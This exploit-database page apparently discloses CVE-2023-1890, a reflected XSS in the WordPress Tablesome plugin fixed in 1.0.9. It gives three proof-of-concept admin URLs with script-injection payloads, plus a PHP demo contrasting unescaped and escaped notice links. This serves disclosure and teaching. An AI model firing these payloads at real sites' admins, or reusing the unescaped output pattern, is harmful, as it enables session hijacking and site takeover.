## https://sploitus.com/exploit?id=PACKETSTORM:173727
Title:  
WordPress Plugin Tablesome < 1.0.9 - Reflected XSS  
  
References:  
CVE-2023-1890  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not escape various generated URLs before outputting them in attributes when some admin notices are displayed, leading to Reflected Cross-Site Scripting.  
  
Affects Plugins:  
Tablesome - Fixed in version 1.0.9  
  
Proof of Concept:  
Make a logged-in admin open one of the URLs below while the feature/tracking notice has not yet been dismissed (the notice must still be rendered for the reflected URL to reach the page).  
  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>   
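The following is an added illustration of the bug class behind this advisory, written for this page; it is not Tablesome's own code and the parameter names, page and stand-in helpers are hypothetical. It shows how a notice link built from the current request (the add_query_arg() pattern) reflects the query string into an href attribute, why the percent-encoded first PoC still lands raw, why the `</script><script>` PoCs imply an inline-script context that attribute escaping does not cover, and the escaped forms (esc_url() for attributes, wp_json_encode() with JSON_HEX_TAG for script literals). Outside WordPress the WP helpers are replaced by simplified stand-ins so the script runs alone with `php notice_xss_demo.php`.

```php
<?php
// Added illustration of the bug class, not Tablesome's own code. Outside
// WordPress the WP helpers are replaced by the stand-ins below; inside
// WordPress the real functions are used because of function_exists().

if (!function_exists('add_query_arg')) {
    // Stand-in approximating WordPress add_query_arg(): with no URL argument it
    // starts from $_SERVER['REQUEST_URI'], percent-decodes the existing query
    // string and re-emits it without re-encoding. That is why the
    // percent-encoded first PoC URL still lands raw in the page.
    function add_query_arg(array $args, ?string $url = null): string {
        $url   = $url ?? $_SERVER['REQUEST_URI'];
        $parts = explode('?', $url, 2);
        $qs    = [];
        if (isset($parts[1])) {
            parse_str($parts[1], $qs);
        }
        $pairs = [];
        foreach (array_merge($qs, $args) as $k => $v) {
            $pairs[] = $k . '=' . $v;
        }
        return $parts[0] . '?' . implode('&', $pairs);
    }
}
if (!function_exists('esc_url')) {
    // Stand-in for the escaping part of esc_url(): quotes and angle brackets
    // become entities, so the value cannot terminate the attribute or the tag.
    function esc_url(string $url): string {
        return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('wp_json_encode')) {
    function wp_json_encode($data, int $flags = 0): string {
        return json_encode($data, $flags);
    }
}

// Constructed request matching the first PoC URL (hypothetical admin page).
$_SERVER['REQUEST_URI'] = '/wp-admin/edit.php?post_type=tablesome_cpt'
    . '&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E';

// The dismiss link is built from the current request, so the attacker's query
// string travels into it. Parameter name is hypothetical.
$dismiss_url = add_query_arg(['tablesome_feature_notice_dismissed' => 1]);

// Vulnerable attribute context: the payload's  ">  closes href and the <a>
// tag, and <details open ontoggle=...> is parsed as real markup.
function vulnerable_notice(string $url): string {
    return '<div class="notice"><a href="' . $url . '">Dismiss</a></div>';
}

// Fixed: escape at the point of output.
function fixed_notice(string $url): string {
    return '<div class="notice"><a href="' . esc_url($url) . '">Dismiss</a></div>';
}

// Inline-script context, which the `</script><script>` PoCs target: the HTML
// parser ends a <script> element at the first </script> regardless of JS
// string quoting, so attribute-style escaping is not the right fix here.
function vulnerable_script(string $url): string {
    return '<script>var tablesomeDismiss = "' . $url . '";</script>';
}

// Fixed: JSON-encode with JSON_HEX_TAG so < and > become \u003C and \u003E and
// no literal </script> can appear inside the script block.
function fixed_script(string $url): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script>var tablesomeDismiss = ' . wp_json_encode($url, $flags) . ';</script>';
}

echo vulnerable_notice($dismiss_url), PHP_EOL;
echo fixed_notice($dismiss_url), PHP_EOL;

// Constructed request matching the third PoC URL.
$_SERVER['REQUEST_URI'] = '/wp-admin/edit.php?post_type=tablesome_cpt'
    . '&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>';
$track_url = add_query_arg(['can_track_tablesome_events' => 0]);
echo vulnerable_script($track_url), PHP_EOL;
echo fixed_script($track_url), PHP_EOL;

// Self-check: the escaped forms never contain a live tag from the payload.
assert(strpos(fixed_notice($dismiss_url), '<details') === false);
assert(substr_count(fixed_script($track_url), '</script>') === 1);
```

Running it prints the vulnerable markup (where `<details/open/ontoggle=...>` and the injected `<script>` block are live) next to the escaped markup. The general rule the advisory's fix in 1.0.9 corresponds to: never trust a URL produced by add_query_arg() or similar request-derived helpers; escape it for the exact context it is printed into, or hand it to the script via wp_localize_script() instead of echoing it inline.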
  
Classification:  
Type: XSS  
OWASP Top 10 (2017) A7: Cross-Site Scripting (XSS)  
CWE-79  
  
WPScan:  
https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d